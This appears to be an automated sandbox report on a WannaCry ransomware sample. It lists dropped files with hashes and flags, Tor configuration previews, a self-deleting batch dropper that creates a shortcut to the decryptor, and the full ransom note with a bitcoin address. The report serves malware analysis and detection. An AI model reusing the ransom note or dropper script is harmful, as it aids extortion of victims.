                                                  SSDEEP:24:bko4CzWsS2kNgGlvDnOXwj3pcqyWFGdAZN4YE2ZCBk1Wgdnibjq9Gr8o+AYfcKsy:bkqzzpkWGpDtGa74eCBk1WgdAjqov+A0
                                                  MD5:451571151F76AFFC5C001B67FC3C42A3
                                                  SHA1:6E5D489FA2B80DEC5F6424A1A69CC1E76F12AB9D
                                                  SHA-256:440EF8CAEA4A219FFA10FCC4452D05DCDD6D63FBD986755B0D2DA8C2B945647A
                                                  SHA-512:DA1A95633211C55A03152B770DF72A4AE750A4F6A8E08D3B49B6AFC6B1BE9E055FD300568BE776AC68495DF1F3FE0B54149BBBCA870B3DE67C82E21D884A12CC
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.837995244631193
                                                  Encrypted:false
                                                  SSDEEP:24:bkU6p2EzABs0bvv2cUYjIvnyHbe5VtcDAGTmmuzyn0hBIazb+GyIy+z8H:bkU6MEOzgVAyRGT90hBIa/+GVy5H
                                                  MD5:B1C00284657B116708C8CF5E77EDA5AE
                                                  SHA1:33477415B3286F0B2ECDA5F1EA3CB327256D1A17
                                                  SHA-256:4D2CBC0960AA419DF398BB3524C1A77A530EEF75A209720BE73649E9820A1F81
                                                  SHA-512:44FBFB0BEF29E3A9F1A30F6FF0E16325604918AACF2E84FAC1C5EAF655EB7BD776D875E10E17317BD1858A84E441D59144DD7FE379E549651741B42806BFB9A4
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.85512783623806
                                                  Encrypted:false
                                                  SSDEEP:24:bkNx8Hw0Ir5L4ttY8HWiBgSkTHyY/OWq8iYGSUsg25vJLecT0M8t5m2F7XKZdnCI:bkkQ0iLE1HpBgSahwk5vheY0BPmI7T8
                                                  MD5:3D8086BBD173F8231A745F7C2C9C0C90
                                                  SHA1:E0B6F9FA720C866CCF818EC896DCE57A769262F0
                                                  SHA-256:934BEC187C6CB58A61C044D69CC6D36CA7EAA2905711BCEE0FEE7429309E4DD3
                                                  SHA-512:94C8255AEF4DC9C05169AFC4008AED2A595E000E3AB3BDBD454135B47073401AAD0B373C2DEE87B7C48C13148DD4C262AE720C1FBECBE70DB1546066DDCFBE29
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.8528554217771465
                                                  Encrypted:false
                                                  SSDEEP:24:bkozntZRVYmh9gyha0sR79843TBBzeKazqJBjOngcTnI51hgI1EpGX:bkGnnP5hHcF3NFcWd8HUXhgJMX
                                                  MD5:31933FE4B281BAB536A3BF7F304864FF
                                                  SHA1:DAF90D2F390DEFD924EA66097E6594A9EB785969
                                                  SHA-256:19D28318BF5DFE48CB47CE5D3D2AF792AEC6A84729261CA58F31055437AEB3E3
                                                  SHA-512:FB2F91BAF72D932EA8E2EDD8A3CEB908326313C7CF791C19ED147B66F296DB916DF3ED7C8A02E381252C00D1A1AD9327328415B104D3D6C27D944A9318558918
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.839471053634642
                                                  Encrypted:false
                                                  SSDEEP:24:bkGEhTMdIXvOnuUaiH2hMwpoZ2tQ79RBT5SMDBzVtuxO8uoBjHsk1j1i:bkGJ6vUudiH2gh/TRo0oBBw
                                                  MD5:D3E58DFA7A0F520E82A9B08E2C548405
                                                  SHA1:32E10D0023641AE35EE063641646A2F0DD4EC443
                                                  SHA-256:AD3727009DD6C6E1CE4E8F69591087AA10CF2D12C0C1EC22BA2A719698A202C9
                                                  SHA-512:6025BB681CC95D70E51B68ADDEC1C7C5EEC0187F3AA823B31A253CB59AEB2DE4340DF2EFA5E87BC01E3833191BD1C6768B7ECB68E041BF98EF484E37C04123E7
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.871684192188505
                                                  Encrypted:false
                                                  SSDEEP:24:bkoDpWFYaq/ubJ7U3zUtZYZ68e6fxuLiGFOf3aWv0sXuONsCIUNNiaQUCT0:bke5uGws68NpkTFkvvHu+bI25QR0
                                                  MD5:FDA15A5B6685D9AEF726D90E74CB8E5F
                                                  SHA1:31CF19955E0860152159DA35A4F0518C0E888C3C
                                                  SHA-256:BAA8D99BF8C62027463F39B4F5398656880AE9D6905369C06562B71C735A0A57
                                                  SHA-512:C626DCCF771D43FA4F9F970A0429520135285BB403C324B7851910EEB02539C2DA590A7F6A2E8230431E4289E8124C4704CE6555A2E2D1666D891E47864441DD
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.861940426202923
                                                  Encrypted:false
                                                  SSDEEP:24:bkq86g56zB0Y2HHWe/u27jf0VbT6rCfTgukHud382dYgcQvuOHvqIV/DJ:bk5v56zB0tHWetHf0VbwCrmktigbhDJ
                                                  MD5:33E1AA8C4291ECA6E89A23A05134B71E
                                                  SHA1:B0DBC8F8B2B41B982DB91F65450FC7E0E8292BAA
                                                  SHA-256:1E7DC0F44281984A6F827DE006F4BCC666F62B6FE0AF0AEECD146D78DE0B6B33
                                                  SHA-512:A583707D59908B8D9190F502AD908241400769F6D807D870B85DCBB864B2892D0C493C5F8022A3389EBB053BA22ACED9826B937E3648F3F280EF63CE4C633202
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.857915123985954
                                                  Encrypted:false
                                                  SSDEEP:24:bk0JLdTA6pSYQGJZBq/h7211iIc6j/fXRpEWP+GcYQ8QAGLK:bkcLi6QYtVqZSrfXRpGGcYbIO
                                                  MD5:581ABFAC5CA2CC0DA658625701B59AA0
                                                  SHA1:AD1246C831AE20976F1BB3E5FF794B5C5A31D94E
                                                  SHA-256:55CD03B1A4131DD022774DCEF1450F32DAE1AA0E9E6E24330DD1D24DB2F11515
                                                  SHA-512:F05A551E297ADE8012D3E5916FE308D7C986E8ED259B7720BE947651AA7F1A3819DA1FB72523E815EDAAF2E804B482836AAF4FC55E655038E4185C852074C33D
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.85417753979318
                                                  Encrypted:false
                                                  SSDEEP:24:bk1P06vx0Hykr/WgeHuxfFykadxzkJlkgR2RbYFeTynNtTUD5GnXIsnroP/kqf0n:bk1P0e0HdWBHm1adlk3dR2hYFKOYlGXZ
                                                  MD5:9DE02CC60589F34A4B96FEFCD9909704
                                                  SHA1:66FC1CE161EB8DCC1954AD149DF3CB3471B6354E
                                                  SHA-256:FAF1DF84986305E9644CC78C56FBEEE75261D737996D1584A5272AFAC966AB44
                                                  SHA-512:79BB02E6F15325F98311655B6E9E711DCAAAD68A0B5B7ED1E263CF0EF08A820F6C33D14170B773D5947B6A4A341BF9BDDAB2CB6D9633D2851EF1B5C4F0651C2A
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.830720891656247
                                                  Encrypted:false
                                                  SSDEEP:24:bkK2HqT70oYVZz7LsLKWrv0lm1ZbyYYqc94zGcwcDHYiIQ76KsH4okdE3:bkK2HqTAoYVmOWrvjZWfraxp2KDoF3
                                                  MD5:30CFA429B724F2B7A17E4915AA7FE6A2
                                                  SHA1:ABE7695E0E4E7C3D66F0D98073A69296BE6D8A60
                                                  SHA-256:09461963138E6C9693507F856D1F2232FFAC66DABA8755131089C9FAC14C4A69
                                                  SHA-512:40142FEABA30525A9568F52C1228F2A3E7D3D6DBC455976114A377462600039C1D5436BF54B74710641DE9DF6EC46A3D6ED39629DC0371B1BEF3D4065EDB1800
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.851181274244945
                                                  Encrypted:false
                                                  SSDEEP:24:bkHvca231YjsDIvaSFS/5WbXpke8O6Pts5bAYBzfmanpoeNhE2q3LE:bkPl02aSU/5yXue8O6PaAYBLmanTNy2F
                                                  MD5:5F3FAE3B5BF3DCFA708D912ABF8A65F6
                                                  SHA1:CC459E124F2DFD4583D9E705BFD3030459A82FB1
                                                  SHA-256:BC1B3544DE3234DE2A3D6E31BEBCA05E526161E42859F4B0CA6E63F6FAA970A9
                                                  SHA-512:516792BD1350494392AD9850DD448DC9439C8007BB345B09A7E2CB20832D35A4DD6128A66FCB324F93D8212439128C48A5AAF4AB00078938022B6160B06DAEC6
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):40984
                                                  Entropy (8bit):7.995961555041992
                                                  Encrypted:true
                                                  SSDEEP:768:R2DHMq1UyyLSuyyYTaN4xAG2SzUh3Dk1iVT2cNI3jZ751SrvKsG+UpOa:Ry+ynuCLAG7zgDkwVq6Il5mKGU8a
                                                  MD5:1ED97896B32C5C409416B7202CFD7F5D
                                                  SHA1:B4F142469B7CD386E93A478C6A69BE72E4D4C660
                                                  SHA-256:90BD07713B1A2F137C6F4FCAE1BEA441272F547E8F02D8541C020A7F7431866E
                                                  SHA-512:99ACA26B05649D41C6D9E55C3F97241D172F700639CCF4B3D52A252D9673061217489F05945FE31FD846D0586A5141370967DA9EA7AF2E7BF57441FF1D7F8767
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):125288
                                                  Entropy (8bit):7.998501210566462
                                                  Encrypted:true
                                                  SSDEEP:3072:gxvn3hCJfILYLKPip9Jcth/l6vBJ9S66svgUnkF/f487+h:gxv3QfS2K6p98AH9SR63klv+h
                                                  MD5:3A22A7250F745E7029FC4557729D2673
                                                  SHA1:8DC231AD5463B486D7D807F194A578156C42F08D
                                                  SHA-256:985E8BBB3A798817B2065AA07F41CCADC642A51F59D85E2CFB98CA98BB380B83
                                                  SHA-512:ED8C5FB6D3B42727BE19711D37FF5D9781C051B4B7E53C0287E6BCFEBD3FD4BDEB01266F07F555B42F9215BFB5024FEE74A1DDF9F0F0E3B78F1418A9C33DEF41
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):125288
                                                  Entropy (8bit):7.998501210566462
                                                  Encrypted:true
                                                  SSDEEP:3072:gxvn3hCJfILYLKPip9Jcth/l6vBJ9S66svgUnkF/f487+h:gxv3QfS2K6p98AH9SR63klv+h
                                                  MD5:3A22A7250F745E7029FC4557729D2673
                                                  SHA1:8DC231AD5463B486D7D807F194A578156C42F08D
                                                  SHA-256:985E8BBB3A798817B2065AA07F41CCADC642A51F59D85E2CFB98CA98BB380B83
                                                  SHA-512:ED8C5FB6D3B42727BE19711D37FF5D9781C051B4B7E53C0287E6BCFEBD3FD4BDEB01266F07F555B42F9215BFB5024FEE74A1DDF9F0F0E3B78F1418A9C33DEF41
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):888
                                                  Entropy (8bit):7.736028617106661
                                                  Encrypted:false
                                                  SSDEEP:24:bkuSUxYGPe9vcrtsFCUSAeh9aIecZdw9o/s+rLQt6ybvfh:bkuxxYH94asUFTnYEok+rm6K3h
                                                  MD5:02D1E37B1D4ACF29A9A3988C6B807795
                                                  SHA1:FAC2478B656A65C4ADF2D0AF2475937B1B5CF240
                                                  SHA-256:80E6FB1CAEB7BC77C5367EF2BDACF350E6A45AAFD0ECC7356EC528DC64DF3A0F
                                                  SHA-512:FD2D38710F8898A04D4967B721500D9FABBD700D3F497ABB9472BD78A04B1191CCE9F98C95191298A58FC368D9B336EDA412DFBCE0E35A803D588658320DFECC
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):888
                                                  Entropy (8bit):7.722119169283915
                                                  Encrypted:false
                                                  SSDEEP:24:bkfXT1ony6pfGC/GtrfsmxCE+w1cZNGliOM:bkfXT1onhpyLDpvqNGlK
                                                  MD5:9C0A60FC529A21C2CA883FE7AC4A3F19
                                                  SHA1:CB9CF531D3750CDC9E75987210ED58F703506765
                                                  SHA-256:EE20CD659D6968A1F0A2287B0E9E24EC0E07D75C4434318D8724B67C7E0DF310
                                                  SHA-512:EDD13B81C8849C50DBF685E72518DAA6EB7C7105065D3DBD32F9A75BDA336F26B3C02AACC077B3BF0AD9983D8C33A28D4F88B3E08CD3D2D8B94E766890F810E3
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):229656
                                                  Entropy (8bit):7.999216621550258
                                                  Encrypted:true
                                                  SSDEEP:3072:w8g8RS41otwOz0ApvQ2XkzxzAlKtfsPV7cJZ/CMkkdug71t/Is8KSHC25vpW:w2oqMTQEiNreVIJJdfwPXHCyhW
                                                  MD5:DAF34BAA727968B2DF0063B4014501DC
                                                  SHA1:972AC17BD5F29C2EFE7122AFFA1270A2C17E0610
                                                  SHA-256:1EACE0BC6F50E4920EAF2CFC6E90768C819260111E5C8373E0188688DE198499
                                                  SHA-512:F59158E0898D3618B99C8304610FC79F9515E3B9C82F41FAF9418E7CAD88A1CA63FBCB208BC884FA2DEAFBA284F0B61827DFD033BA6B0180AB55F2AAEB08A0D0
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):760
                                                  Entropy (8bit):7.730406935914848
                                                  Encrypted:false
                                                  SSDEEP:12:bkEULfnVdVPUUc8FFBFeGQ0qiSwbUjMIpjAaeFsVmASDICkmWeZFwPU3f1SKMwv3:bklLfzlq8Fgb1wbUj3pjAKVvCkmWeZGk
                                                  MD5:B42CBA6F412BF74D64620F3703764B89
                                                  SHA1:D66493D98A5F38D6301E825591B0ECF0A5A090E5
                                                  SHA-256:D3D544797AA027248DF7ACC14FD2C97E35AEA645AC479045EBBD1977B58313FC
                                                  SHA-512:56CD36F4C618F6E32AA84EECFC3B8BE1DA3CD2621239F9C6D71BA993FD7CD36952C9853BBEB4A5F0D04223B038638EA21606F3F54458AE7245B0BA572C392FD8
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):295192
                                                  Entropy (8bit):7.999422556039973
                                                  Encrypted:true
                                                  SSDEEP:6144:9Ldm/3hcskdIYLZdHqDYqEcKSSwmbG/XGH1mlfsGgag/:9LI3yskdIYLZI0lwqbG/2Vmlty
                                                  MD5:0949CB15CE9A8A227A31E7D293B83F22
                                                  SHA1:AE2D9F0423B460E8956065A363B8EB21C1F024AD
                                                  SHA-256:3FB76001672D8ADED99421D7E37BCD0B1EE1D242F1E8EF9D261A66FF4499A369
                                                  SHA-512:8B2ED7AA98B7BCDDA34EB8E439566899649BBEC9DA1CF07496F00688EF96769CAFDBDF2AE579400DECDBDB82B224B12EA8DE2E9995A932951E65C0CDEF37D74E
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):792
                                                  Entropy (8bit):7.69044397682822
                                                  Encrypted:false
                                                  SSDEEP:24:bkKD3d2xdb/Os+NqRiLR8Bk41JbgtvGTaq6WDRrM:bkKDNoOs+qRzWwyvGTaWDRQ
                                                  MD5:66965AF229E07BA3BF455F9F917EE6FC
                                                  SHA1:563819B3AFC120A3580020AE3B7C43125BE7F8B3
                                                  SHA-256:356A6C14B5A68D5DFE637718690135FC5A81314B6325B0EE083F940A56D833DE
                                                  SHA-512:25D39F8793D3B368B7A2F6BCE1320614B4974F6CB04CE94F8C79EA65D6A883246FF85A0F7332A8977899F4DAFD424ECAC888FCF8597B07A776E329EA0B58A39B
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):12216
                                                  Entropy (8bit):7.983756714992244
                                                  Encrypted:false
                                                  SSDEEP:192:mwzRSTFGH8Lkw1O8dmxSWih1BeGZFNjvaJPUuJ3xMyIYSfCDORiodjA3CLg+b:mwzRACOr1O5xSLBVZH+LlOyIlfCDOo2p
                                                  MD5:B758B7D0A1C9558F551B9CB356B5DCE3
                                                  SHA1:9F2E9F380768779E965C2B8B2822B6FA85239041
                                                  SHA-256:EA6AF0E64A2F734B6253B00F5BB881D8C4E09CB015A4AF035EDCF74A4476C683
                                                  SHA-512:18AF1334F4DC43F7B427312C44002BB1EDB04C6A6AF4D7E0771AAC5E2BBA39F7847E608084F348F8E6691B00D36DCF86252981F976BC685A44686BA75147D890
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!
                                                  Process:C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):18574
                                                  Entropy (8bit):6.053176809709424
                                                  Encrypted:false
                                                  SSDEEP:384:yMY4YVvR1hqQos2h4YVc1h1nd4oGbVla1hQfyyd24ZFtVf1hc1x//4DVEl1hnb52:wJL+QJ6xyhd1ImOy62M1uxnyKDb+3jnF
                                                  MD5:2DEB894B10A61E5B56DB1A378403B4FF
                                                  SHA1:1183DFE1ACF498747681B9C94BE72E182A32A273
                                                  SHA-256:ED80D2981DA19865B7D7FBD24BF5CEF3A20B01BD3C9CBBB9812F81B0EAE36768
                                                  SHA-512:21A42399FE0FC36C18F0339BEA7FA0A0C0024C4CFF76E48DBCEAE63F07698037CE74A466B3612079CAFE3E2CEB889856DF52B6D159C8512B1AFF9B29EC5AA15F
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:dir-key-certificate-version 3..fingerprint 0232AF901C31A04EE9848595AF9BB7620D4C5B2E..dir-key-published 2022-06-14 11:48:34..dir-key-expires 2023-06-14 11:48:34
                                                  Process:C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe
                                                  File Type:ASCII text, with very long lines (951), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):2467187
                                                  Entropy (8bit):5.658388256115609
                                                  Encrypted:false
                                                  SSDEEP:24576:Dft4yKt8kAO9vC14oin83GO7HGxPdBTMQ/:DfmVXn8WL/
                                                  MD5:28C57845536B4188DE4B6727C3DD246F
                                                  SHA1:4A30A12A785B69E26D1147FA63ECA6AB03981F98
                                                  SHA-256:46853E5FE4697CBF72B97895358DCA4272D31834E2AAAAA2C44690A3A4E4A2D4
                                                  SHA-512:AFC1016BAE2CB7AB81F1A152BFE7B4C10609B3A378060AE28DB7DE4CB0CCF12557AF345DF7596CB16AA6A770AAAB7B5A48807054958C335D536A21D622F30005
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:network-status-version 3 microdesc..vote-status consensus..consensus-method 32..valid-after 2023-05-15 07:00:00..fresh-until 2023-05-15 08:00:00..valid-until 2023-05-15 10:00:00..voting-delay 300 300..client-versions 0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12,0.4.7.13..server-versions 0.4.7.7,0.4.7.8,0.4.7.10,0.4.7.11,0.4.7.12,0.4.7.13..known-flags Authority BadExit Exit Fast Guard HSDir MiddleOnly NoEdConsensus Running Stable StaleDesc Sybil V2Dir Valid..recommended-client-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 Microdesc=2 Relay=2..recommended-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2..required-client-protocols Cons=2 Desc=2 Link=4 Microdesc=2 Relay=2..required-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2..params CircuitPriorityHalflifeMsec=30000 DoSCircuitCreationBurst=60 DoSCircuitCreationEnabled=1 DoSCircuitCreationMinConne
                                                  Process:C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):384
                                                  Entropy (8bit):5.160817353994291
                                                  Encrypted:false
                                                  SSDEEP:6:SbdWwxXK5kxnXr87+QVe2vwR/EnR58EEQLsT0+EEQiUEFjuWWURbibfl8wE:bwxXK5kxXr87HVBvwNu5TEQG0dEQipj9
                                                  MD5:D1F28CDB1378AAFDA9588E24D7938DB7
                                                  SHA1:3107C8D4DE712A793055751372B292E5381BCED7
                                                  SHA-256:E6FC7A7D16EEABA3114421553E819E2C55C2D8D8DDD64F78B5A2E440CBC1333A
                                                  SHA-512:50C73AE1E71759547952F21DB9369A296274D8F8A6305CBB21A27D742C486D446E97045262EED160E5F7C27282C53624F8E08500F81830596AC6C7ADFC21C26A
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:# Tor state file last generated on 2023-05-15 09:31:52 local time..# Other times below are in UTC..# You *do not* need to edit this file.....EntryGuard despacitor E00DFD54DC165D5452FBD3530D30186DAD016A0C DirCache..EntryGuardAddedBy E00DFD54DC165D5452FBD3530D30186DAD016A0C 0.2.9.10 2023-04-28 12:51:33..TorVersion Tor 0.2.9.10 (git-1f6c8eda0073f464)..LastWritten 2023-05-15 08:31:52..
                                                  Process:C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:modified
                                                  Size (bytes):384
                                                  Entropy (8bit):5.160817353994291
                                                  Encrypted:false
                                                  SSDEEP:6:SbdWwxXK5kxnXr87+QVe2vwR/EnR58EEQLsT0+EEQiUEFjuWWURbibfl8wE:bwxXK5kxXr87HVBvwNu5TEQG0dEQipj9
                                                  MD5:D1F28CDB1378AAFDA9588E24D7938DB7
                                                  SHA1:3107C8D4DE712A793055751372B292E5381BCED7
                                                  SHA-256:E6FC7A7D16EEABA3114421553E819E2C55C2D8D8DDD64F78B5A2E440CBC1333A
                                                  SHA-512:50C73AE1E71759547952F21DB9369A296274D8F8A6305CBB21A27D742C486D446E97045262EED160E5F7C27282C53624F8E08500F81830596AC6C7ADFC21C26A
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:# Tor state file last generated on 2023-05-15 09:31:52 local time..# Other times below are in UTC..# You *do not* need to edit this file.....EntryGuard despacitor E00DFD54DC165D5452FBD3530D30186DAD016A0C DirCache..EntryGuardAddedBy E00DFD54DC165D5452FBD3530D30186DAD016A0C 0.2.9.10 2023-04-28 12:51:33..TorVersion Tor 0.2.9.10 (git-1f6c8eda0073f464)..LastWritten 2023-05-15 08:31:52..
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:b.out overlay pure segmented standalone executable V2.3 V3.0 86 Large Text
                                                  Category:dropped
                                                  Size (bytes):276
                                                  Entropy (8bit):7.119495279154256
                                                  Encrypted:false
                                                  SSDEEP:6:mtNBgyzT3WqUGXYABbq1PBhu7KkuDknhXE2VR8/GCA3wy8qJd9:YrT3PBbqzZseYR8/pAgy8qJ
                                                  MD5:C772D05EACC3291EF8428892CE7DBD8C
                                                  SHA1:C9C4468566F30B4682BEF64E662FB161309B7E61
                                                  SHA-256:6E9DAE07E926EA6EF391E85B1798F5CF932F9244620167A62EC9F3B01EC32B39
                                                  SHA-512:D0B382ABDB296296C4BE1EC89F0A1A4012EABD3DBE38022627C0F0D303191D7B7C3DD1E6BFBAADFD31B1846219D52DAED4DF80C8B9185C2F0C301DE22767CE13
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:........RSA1
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):136
                                                  Entropy (8bit):1.5032029626324017
                                                  Encrypted:false
                                                  SSDEEP:3:42Iqtcl/5Ysl7LOgtl:7IxlnLll
                                                  MD5:5051D987962C43EE725D46F24E7B05A3
                                                  SHA1:EED7D4D30641C96CC0EA7174E7164D8755AD8766
                                                  SHA-256:CCFA0AB527F6588CFEE811E1C1A440C79B6B506B34C24744A73502730B062CC4
                                                  SHA-512:4D1531F5AFB17630D219D97F0DAD73EC70E0A968A564DBC821FE54B83A7D9BB00C20D98895BB2A869E40957AC8CDEE75846CFACC84F534C96791810215AEA111
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:DOS batch file, ASCII text, with CRLF, CR line terminators
                                                  Category:dropped
                                                  Size (bytes):320
                                                  Entropy (8bit):5.087022538559631
                                                  Encrypted:false
                                                  SSDEEP:3:mKDDfewSiponv6xewImKFcsDONy+WlynJ96wYexi+XCrbPONy+WlynJfF06xiHYM:hqn4+B9TnRoJgpPnRoJ0F9a2T2ZLT2Ln
                                                  MD5:09AAE1ABF5568DD1F940137DD8DAF634
                                                  SHA1:857AFA678E47B47033502409FF9F1ED630B2DB72
                                                  SHA-256:0520935E7778057E45B297E4B934EE3CE3DB1051B67BE1DD9015BACB5B36CD15
                                                  SHA-512:6BFE594D04349B567375B027D8468D8059428E1BD03C80A0006522ECA998D34597ECD62A6462C2668A9C38C11A3B663C781DC385E6AF5F32A7E6152317E82453
                                                  Malicious:false
                                                  Yara Hits:
                                                  • Rule: WannCry_BAT, Description: Detects WannaCry Ransomware BATCH File, Source: C:\Users\user\Desktop\198851684139341.bat, Author: Florian Roth (Nextron Systems)
                                                  Reputation:unknown
                                                  Preview:@echo off...echo SET ow = WScript.CreateObject("WScript.Shell")> m.vbs...echo SET om = ow.CreateShortcut("C:\Users\user\Desktop\@WanaDecryptor@.exe.lnk")>> m.vbs...echo om.TargetPath = "C:\Users\user\Desktop\@WanaDecryptor@.exe">> m.vbs...echo om.Save>> m.vbs...cscript.exe //nologo m.vbs...del m.vbs.....del /a %0..
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):933
                                                  Entropy (8bit):4.708686542546707
                                                  Encrypted:false
                                                  SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                                  MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                                  SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                                  SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                                  SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:PC bitmap, Windows 3.x format, 800 x 600 x 24, image size 1440000, resolution 3779 x 3779 px/m, cbSize 1440054, bits offset 54
                                                  Category:dropped
                                                  Size (bytes):1440054
                                                  Entropy (8bit):0.3363393123555661
                                                  Encrypted:false
                                                  SSDEEP:384:zYzuP4tiuOub2WuzvqOFgjexqO5XgYWTIWv/+:sbL+
                                                  MD5:C17170262312F3BE7027BC2CA825BF0C
                                                  SHA1:F19ECEDA82973239A1FDC5826BCE7691E5DCB4FB
                                                  SHA-256:D5E0E8694DDC0548D8E6B87C83D50F4AB85C1DEBADB106D6A6A794C3E746F4FA
